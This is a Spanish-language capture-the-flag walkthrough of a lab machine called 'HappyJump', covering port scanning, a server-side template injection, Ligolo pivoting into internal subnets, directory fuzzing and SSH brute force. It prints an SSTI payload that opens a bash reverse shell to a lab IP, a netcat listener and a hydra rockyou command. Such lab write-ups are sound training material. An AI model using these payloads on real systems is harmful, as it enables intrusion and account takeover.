HappyJump (LIGOLO)

LIGOLO

Escaneamos la red objetiva:

  • -p- : Escaneo de todos los puertos. (65535)

  • -sS : Realiza un TCP SYN Scan para escanear de manera rápida que puertos están abiertos.

  • -sC : Realiz una escaneo con los scripts basicos de reconocimiento

  • -sV : Realiza un escaneo en buqueda de los servicios

  • –min-rate 5000: Especificamos que el escaneo de puertos no vaya más lento que 5000 paquetes por segundo, el parámetro anterior y este hacen que el escaneo se demore menos.

  • -n: No realiza resolución de DNS, evitamos que el escaneo dure más tiempo del necesario.

  • -Pn: Deshabilitamos el descubrimiento de host mediante ping.

En el puerto 5000 nos encontramos un aplicativo web con un panel de regitro:

Intrusion host principal

Si probamos a hacer una operación aritmética vemos que nos devuelve la respuesta por lo que estamos frente a una vulnerabilidad Server Side Template Injection SSTI.

Nos da lo siguiente:

Al ver que funciona este script nos damos cuenta que era por:

LogoServer Side Template Injection - Python - Payloads All The Things
Documentación

Nos ponemos en la escucha:

 nc -nlvp 9001

Y con el siguiente Paylod entablamos la conexión: 

{{ self.__init__.__globals__.__builtins__.__import__('os').popen("bash -c 'bash -i >& /dev/tcp/192.168.175.128/9001 0>&1'").read() }}
ENTRAMOS

Una vez dentro nos damos cuenta de que hay mas interfaces, en esta caso de docker.

Comando:

hostname -I

Resultado:

192.168.175.130 172.17.0.1 10.10.10.1

Análisis:

¿CÓMO USAR LIGOLO?

  • 192.168.175.130 → IP en la red local (posible red de la víctima, probablemente a través de una VPN o red interna).

  • 172.17.0.1 → IP común en interfaces Docker (puede indicar que hay contenedores corriendo).

  • 10.10.10.1 → Otra red local, posiblemente una subred usada por servicios internos.

LA NOTA NOS DICE QUE INTENTEMOS ENTRAR A LA RED 10.10.10.2 Y ESO HAREMOS CON LIGOLO

BIEN DESPUES DE VER LAS NOTAS DE COMO USAR LIGOLO NOS CONECTAMOS:

fping -a -g 10.10.10.0/24
Encontramos dos

Según las notas en la red 10.10.10.2 hay algo asi le hacemos un escaneo:

OJO: Los parametros de qui en adelante en pivoting para ligolo no tienen que tener muchos hilos porque sino peta.

❯ nmap -p- --open -A -sS -Pn -n -v 10.10.10.2

Miramos el puerto 80:

Apache2

Listamos los directorios con ffuf

ffuf -c -rate=50 -fs 10701 -e .html,.php,.txt,.zip,.xml,.json,.jpg \
-w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-u http://10.10.10.2/FUZZ
Se encontro un shop

Seguimos fuzeando archivos ahora:

❯ ffuf -c -t 50 -e .html,.php,.txt,.zip,.xml,.json,.jpg \
-w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-u http://10.10.10.2/FUZZ \
-fc 404 -fs 10701 -s

Entramos al index.php:

  • Los posibles users que tienen bash:

Usamos hydra con los usuarios por el puerto 22 ssh:

❯ hydra -t 64 -l manchi -P /usr/share/wordlists/rockyou.txt -s 22 ssh://10.10.10.2
❯ ssh manchi@10.10.10.2

SEGUNDO PIVOTING (20.20.20.2)

## ESTE SERA EL TUNELIZADO LIGOLO2 
sudo ip tuntap add dev ligolo2 mode tun user $USER && sudo ip link set ligolo2 up && sudo ip route add 20.20.20.0/24 dev ligolo2
Si todo está en orden y los agentes/proxies de Ligolo2 están conectados, esta línea es perfectamente válida para establecer el segundo túnel y enrutar tráfico a través de él. Solo asegúrate de tener una buena visibilidad del flujo de red y de la arquitectura.

Escaneo a la nueva red privada:

Al abrir la página web que corre en el puerto 80 se encontro:

La cual le haremos una búsqueda de directorios:

  • También nos damos cuenta que es casi lo mismo que la maquina posterior:

BigPivoting (LIGOLO)

Previous¿CÓMO USAR LIGOLO?NextBigPivoting (LIGOLO)

Last updated